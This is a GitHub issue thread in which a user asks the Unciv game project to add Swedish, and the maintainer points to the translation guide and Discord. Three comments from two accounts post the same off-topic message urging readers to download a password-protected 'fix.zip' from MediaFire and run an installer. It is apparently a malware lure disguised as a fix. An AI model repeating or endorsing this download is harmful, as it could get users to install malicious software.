### ISSUE TITLE
Add Swedish Language

### ISSUE THREAD

**Issue by MiMiGame-1** [yairm210/Unciv#12168]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Game Version

1.12.18

### Describe the bug

Yes? Add!!!!!!!

### Steps to Reproduce

1. Go to 'Unciv (https://github.com/yairm210/Unciv)'
2. Click on 'Code'
3. Scroll down to 'sp'
4. See add

### Screenshots

![Screenshot_2024-08-27-16-54-22-59](https://github.com/user-attachments/assets/e4838996-d1e5-4f9a-bd86-8b795d081235)

### Operating System

Android

### Additional Information

Yes?????

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yairm210** [comment]
Translation instructions are here: https://yairm210.github.io/Unciv/Other/Translating/
If you need any help we have a dedicated channel in [the Discord server](https://discord.gg/bjrB4Xw) for translations

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
